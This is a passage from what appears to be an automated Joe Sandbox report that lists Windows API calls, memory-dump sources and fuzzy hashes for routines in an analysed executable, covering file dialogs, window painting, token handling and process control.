              • Part of subcall function 00FA7620: _wcslen.LIBCMT ref: 00FA7625
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
            • GetOpenFileNameW.COMDLG32(00000058), ref: 010194E5
            • _wcslen.LIBCMT ref: 01019506
            • _wcslen.LIBCMT ref: 0101952D
            • GetSaveFileNameW.COMDLG32(00000058), ref: 01019585
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$FileName$OpenSave
            • String ID: X
            • API String ID: 83654149-3081909835
            • Opcode ID: 76c9cd006d0ae99b15a265c8b72f2dfb6ffe38d8460131a6e9308433fb97c470
            • Instruction ID: 06684efc06ddae3c66389a1d726b7cbf87dccf681f28bd3a174ed5f2e948e852
            • Opcode Fuzzy Hash: 76c9cd006d0ae99b15a265c8b72f2dfb6ffe38d8460131a6e9308433fb97c470
            • Instruction Fuzzy Hash: FDE1B4719083118FD724DF24C891E6EB7E4BF85314F08896DF9899B296DB39ED04CB92
            APIs
              • Part of subcall function 00FB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB9BB2
            • BeginPaint.USER32(?,?,?), ref: 00FB9241
            • GetWindowRect.USER32(?,?), ref: 00FB92A5
            • ScreenToClient.USER32(?,?), ref: 00FB92C2
            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FB92D3
            • EndPaint.USER32(?,?,?,?,?), ref: 00FB9321
            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00FF71EA
              • Part of subcall function 00FB9339: BeginPath.GDI32(00000000), ref: 00FB9357
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
            • String ID:
            • API String ID: 3050599898-0
            • Opcode ID: 6cdd70def0726732ac98eb3c2f202daae8e7b84f7813ee3f7e74e3adeadac2c1
            • Instruction ID: b763954304b32e7b8b42b04d9aa2a18f34d289455d71069c307c3331caf7c535
            • Opcode Fuzzy Hash: 6cdd70def0726732ac98eb3c2f202daae8e7b84f7813ee3f7e74e3adeadac2c1
            • Instruction Fuzzy Hash: 0441AF71508300AFE721DF25C884FBA7BE8EF4A320F140269FA94D72E1C7769845EB61
            APIs
            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0101080C
            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 01010847
            • EnterCriticalSection.KERNEL32(?), ref: 01010863
            • LeaveCriticalSection.KERNEL32(?), ref: 010108DC
            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 010108F3
            • InterlockedExchange.KERNEL32(?,000001F6), ref: 01010921
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
            • String ID:
            • API String ID: 3368777196-0
            • Opcode ID: bbe2f9f5af4cdb97947158dc726d29bc5399b5fbede4cc6d0898403a78ace0a6
            • Instruction ID: b40b0f5b9cf33aedb8a10f97b5afc417d66a6474b6bb20e39b7e3da8bd09e682
            • Opcode Fuzzy Hash: bbe2f9f5af4cdb97947158dc726d29bc5399b5fbede4cc6d0898403a78ace0a6
            • Instruction Fuzzy Hash: 6D418B71900205EBEF159F64DC85AAA77B9FF04300F1440A9FD44EA29BDB39DE64DBA0
            APIs
            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00FFF3AB,00000000,?,?,00000000,?,00FF682C,00000004,00000000,00000000), ref: 0103824C
            • EnableWindow.USER32(00000000,00000000), ref: 01038272
            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 010382D1
            • ShowWindow.USER32(00000000,00000004), ref: 010382E5
            • EnableWindow.USER32(00000000,00000001), ref: 0103830B
            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0103832F
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$Show$Enable$MessageSend
            • String ID:
            • API String ID: 642888154-0
            • Opcode ID: 659746e56d24f1468b6534e61b0291c4800e44e214ecb33c72a7b5126bb6fcc1
            • Instruction ID: 42dd3400bf79a5342057f9c6429b9dc3e5d85613b38efd5f5541481a45a2ea89
            • Opcode Fuzzy Hash: 659746e56d24f1468b6534e61b0291c4800e44e214ecb33c72a7b5126bb6fcc1
            • Instruction Fuzzy Hash: BE418A34601644AFEB62CF19C989BE47BE5FB89714F1483E6FA985F2A3C3366441CB50
            APIs
            • GetForegroundWindow.USER32(?,?,00000000), ref: 010222E8
              • Part of subcall function 0101E4EC: GetWindowRect.USER32(?,?), ref: 0101E504
            • GetDesktopWindow.USER32 ref: 01022312
            • GetWindowRect.USER32(00000000), ref: 01022319
            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 01022355
            • GetCursorPos.USER32(?), ref: 01022381
            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 010223DF
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$Rectmouse_event$CursorDesktopForeground
            • String ID:
            • API String ID: 2387181109-0
            • Opcode ID: fc9932413582f7ddcabfb5a8130ef09125f6296a54e7e48fa090a9ce67176b4b
            • Instruction ID: 6444b76fe20b6ef60463a4c9b80c2fc1b6c2da283a70ff9d28077abfc0762ced
            • Opcode Fuzzy Hash: fc9932413582f7ddcabfb5a8130ef09125f6296a54e7e48fa090a9ce67176b4b
            • Instruction Fuzzy Hash: 1B31AF72504315ABE721DF54C844A9BBBEDFF88314F004A1AF9C5E7181DB35E908CB92
            APIs
            • IsWindowVisible.USER32(?), ref: 01004C95
            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 01004CB2
            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 01004CEA
            • _wcslen.LIBCMT ref: 01004D08
            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 01004D10
            • _wcsstr.LIBVCRUNTIME ref: 01004D1A
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
            • String ID:
            • API String ID: 72514467-0
            • Opcode ID: d7b48e989e9a01207181a3c21f4b330b019dd2dce66e11d45c0332b2b0a810ba
            • Instruction ID: 5a71b66dcc5928b79ea99fe00263621eac9ab5e0f46b1748613cd9b1532abeea
            • Opcode Fuzzy Hash: d7b48e989e9a01207181a3c21f4b330b019dd2dce66e11d45c0332b2b0a810ba
            • Instruction Fuzzy Hash: 722149712042047BFB666B399D09E7F7BDCDF49710F00406EF945DA1D2DA75D80097A0
            APIs
              • Part of subcall function 00FA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA3A97,?,?,00FA2E7F,?,?,?,00000000), ref: 00FA3AC2
            • _wcslen.LIBCMT ref: 0101587B
            • CoInitialize.OLE32(00000000), ref: 01015995
            • CoCreateInstance.OLE32(0103FCF8,00000000,00000001,0103FB68,?), ref: 010159AE
            • CoUninitialize.OLE32 ref: 010159CC
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
            • String ID: .lnk
            • API String ID: 3172280962-24824748
            • Opcode ID: 83ae19e41b7dbfec0210fa242fc388513f47a72df452e8b9b4e43817f5ad754e
            • Instruction ID: bdcd04e29cd95bc255ff6f47ee9ab977f50ee1cebe1898dd4a711cd1c30b403f
            • Opcode Fuzzy Hash: 83ae19e41b7dbfec0210fa242fc388513f47a72df452e8b9b4e43817f5ad754e
            • Instruction Fuzzy Hash: A0D145716083019FC714DF19C88092ABBE6FF8A714F14889DF8899B365DB39ED45CB92
            APIs
              • Part of subcall function 01000FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01000FCA
              • Part of subcall function 01000FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01000FD6
              • Part of subcall function 01000FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01000FE5
              • Part of subcall function 01000FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01000FEC
              • Part of subcall function 01000FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01001002
            • GetLengthSid.ADVAPI32(?,00000000,01001335), ref: 010017AE
            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 010017BA
            • HeapAlloc.KERNEL32(00000000), ref: 010017C1
            • CopySid.ADVAPI32(00000000,00000000,?), ref: 010017DA
            • GetProcessHeap.KERNEL32(00000000,00000000,01001335), ref: 010017EE
            • HeapFree.KERNEL32(00000000), ref: 010017F5
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
            • String ID:
            • API String ID: 3008561057-0
            • Opcode ID: ff6f2d3098dd6475f6f17b06b74bdf35f65640e818306f6ee0b99461544edc3c
            • Instruction ID: b4e36248c4bd0d6eed7c2a2abd8918cdc26e5056aa5786a22617a2d07ad777fd
            • Opcode Fuzzy Hash: ff6f2d3098dd6475f6f17b06b74bdf35f65640e818306f6ee0b99461544edc3c
            • Instruction Fuzzy Hash: 1C119732600205ABFB258FA8C948BAE7BF9FB46355F104099F5C5E7280C73AE940DB60
            APIs
            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 010014FF
            • OpenProcessToken.ADVAPI32(00000000), ref: 01001506
            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 01001515
            • CloseHandle.KERNEL32(00000004), ref: 01001520
            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0100154F
            • DestroyEnvironmentBlock.USERENV(00000000), ref: 01001563
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
            • String ID:
            • API String ID: 1413079979-0
            • Opcode ID: a16b1932a6e99f74d196145ca1c1ef24c006e31ea514db0231ea9b19522a1b0f
            • Instruction ID: 31d16408edf17b84babd1eefdc011364df88c97263ae8586e5084fe6c650d942
            • Opcode Fuzzy Hash: a16b1932a6e99f74d196145ca1c1ef24c006e31ea514db0231ea9b19522a1b0f
            • Instruction Fuzzy Hash: 71112972500249ABEF228F98DE49BDE7BADFF09745F054055FA45A20A0C376CE64DB60
            APIs
            • GetLastError.KERNEL32(?,?,00FC3379,00FC2FE5), ref: 00FC3390
            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FC339E
            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FC33B7
            • SetLastError.KERNEL32(00000000,?,00FC3379,00FC2FE5), ref: 00FC3409
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorLastValue___vcrt_
            • String ID:
            • API String ID: 3852720340-0
            • Opcode ID: 252f2092f2544e48a0ff01deace9bf5542e5f8b9ef5d895096203f7702d0cec2
            • Instruction ID: d7e53d3963dee6ecb5493b5f5b5ea263e321ef0ed8818bd7e509c204e6ce646b
            • Opcode Fuzzy Hash: 252f2092f2544e48a0ff01deace9bf5542e5f8b9ef5d895096203f7702d0cec2
            • Instruction Fuzzy Hash: 0B01B133A0D3536EB62526747F9BF663A94EB163F9720822EF450852F4EF1A4E017684
            APIs
            • GetLastError.KERNEL32(?,?,00FD5686,00FE3CD6,?,00000000,?,00FD5B6A,?,?,?,?,?,00FCE6D1,?,01068A48), ref: 00FD2D78
            • _free.LIBCMT ref: 00FD2DAB
            • _free.LIBCMT ref: 00FD2DD3
            • SetLastError.KERNEL32(00000000,?,?,?,?,00FCE6D1,?,01068A48,00000010,00FA4F4A,?,?,00000000,00FE3CD6), ref: 00FD2DE0
            • SetLastError.KERNEL32(00000000,?,?,?,?,00FCE6D1,?,01068A48,00000010,00FA4F4A,?,?,00000000,00FE3CD6), ref: 00FD2DEC
            • _abort.LIBCMT ref: 00FD2DF2
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorLast$_free$_abort
            • String ID:
            • API String ID: 3160817290-0
            • Opcode ID: c3c93e16a9eb3f9fe88c96f35f755863a1b3fef39db5849ae800d5fc28f19d00
            • Instruction ID: df1c0663d6cd0b77ab348437a7ad161dd330030691ac03e64c59fb5649169eaa
            • Opcode Fuzzy Hash: c3c93e16a9eb3f9fe88c96f35f755863a1b3fef39db5849ae800d5fc28f19d00
            • Instruction Fuzzy Hash: 75F0A936D0560067D2A226386D06A1E356B6BE27B1F2C051BF5A4D6395EE2D890172F1
            APIs
              • Part of subcall function 00FB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB9693
              • Part of subcall function 00FB9639: SelectObject.GDI32(?,00000000), ref: 00FB96A2
              • Part of subcall function 00FB9639: BeginPath.GDI32(?), ref: 00FB96B9
              • Part of subcall function 00FB9639: SelectObject.GDI32(?,00000000), ref: 00FB96E2
            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 01038A4E
            • LineTo.GDI32(?,00000003,00000000), ref: 01038A62
            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 01038A70
            • LineTo.GDI32(?,00000000,00000003), ref: 01038A80
            • EndPath.GDI32(?), ref: 01038A90
            • StrokePath.GDI32(?), ref: 01038AA0
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
            • String ID:
            • API String ID: 43455801-0
            • Opcode ID: 9941f7e001f8555c53f8009c7aa1caa30d995aa8ffe397e4384ed9b6e6eb6374
            • Instruction ID: ec009a2cfcc889e8e4afa1670b19825683dcb79db3a80bf38f40d54d90c9f66c
            • Opcode Fuzzy Hash: 9941f7e001f8555c53f8009c7aa1caa30d995aa8ffe397e4384ed9b6e6eb6374
            • Instruction Fuzzy Hash: 6B111E7600014CBFEF119F94DC48E9A7F6DEB05350F00C052FA55A91A5C7769D55DF60
            APIs
            • GetDC.USER32(00000000), ref: 01005218
            • GetDeviceCaps.GDI32(00000000,00000058), ref: 01005229
            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01005230
            • ReleaseDC.USER32(00000000,00000000), ref: 01005238
            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0100524F
            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 01005261
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CapsDevice$Release
            • String ID:
            • API String ID: 1035833867-0
            • Opcode ID: 999327794778f93a35406a923180a3b7d92fdb9026528b9cbb1bf87185fe381c
            • Instruction ID: e633878181738bc265813be8a1405fa04641d238fcdcb006208563712a22f3bb
            • Opcode Fuzzy Hash: 999327794778f93a35406a923180a3b7d92fdb9026528b9cbb1bf87185fe381c
            • Instruction Fuzzy Hash: E8018F75A00708BBFB109BA59D49A5EBFB8EF49351F044066FA45E7280D6759800DFA0
            APIs
            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FA1BF4
            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FA1BFC
            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FA1C07
            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FA1C12
            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FA1C1A
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FA1C22
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Virtual
            • String ID:
            • API String ID: 4278518827-0
            • Opcode ID: 4a12a09b9e7b978dacbe599518b425360a365a7382eb1ccaed3b075d91b30fd5
            • Instruction ID: 884863afebb483607a7e71a3f419c3cd385b034f4d31c120f7dd59d8855ea0aa
            • Opcode Fuzzy Hash: 4a12a09b9e7b978dacbe599518b425360a365a7382eb1ccaed3b075d91b30fd5
            • Instruction Fuzzy Hash: 9F016CB09027597DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5
            APIs
            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0100EB30
            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0100EB46
            • GetWindowThreadProcessId.USER32(?,?), ref: 0100EB55
            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0100EB64
            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0100EB6E
            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0100EB75
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
            • String ID:
            • API String ID: 839392675-0
            • Opcode ID: 58b298237b98f82e56e0dc6b5199d31fc2e25fdc95c6b32ae4904928a2f0c15f
            • Instruction ID: b06d7f957ab65197791f80d5d8f617db2495ce972da676308cdd0ab13744ac68
            • Opcode Fuzzy Hash: 58b298237b98f82e56e0dc6b5199d31fc2e25fdc95c6b32ae4904928a2f0c15f
            • Instruction Fuzzy Hash: 96F01D72140558BBF63156629D0DEAB3A7CEBCBB11F00415AF641E1084D7A56A0197B5
            APIs
            • GetClientRect.USER32(?), ref: 00FF7452
            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00FF7469
            • GetWindowDC.USER32(?), ref: 00FF7475
            • GetPixel.GDI32(00000000,?,?), ref: 00FF7484
            • ReleaseDC.USER32(?,00000000), ref: 00FF7496
            • GetSysColor.USER32(00000005), ref: 00FF74B0
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ClientColorMessagePixelRectReleaseSendWindow
            • String ID:
            • API String ID: 272304278-0
            • Opcode ID: a0309f1e266b7469d976d5a78e06532422b393872a527a26589d63788c71bcc8
            • Instruction ID: de0721ee33fe93ac6f0f2151ede169f8f5448f3977a0a6428ffd1e3e4495c3ce
            • Opcode Fuzzy Hash: a0309f1e266b7469d976d5a78e06532422b393872a527a26589d63788c71bcc8
            • Instruction Fuzzy Hash: 47018F32400205EFEB20AF64DD08BA97BB9FF04321F500061FA55E20A0CB361D51BB10
            APIs
            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0100187F
            • UnloadUserProfile.USERENV(?,?), ref: 0100188B
            • CloseHandle.KERNEL32(?), ref: 01001894
            • CloseHandle.KERNEL32(?), ref: 0100189C
            • GetProcessHeap.KERNEL32(00000000,?), ref: 010018A5
            • HeapFree.KERNEL32(00000000), ref: 010018AC
            Memory Dump Source
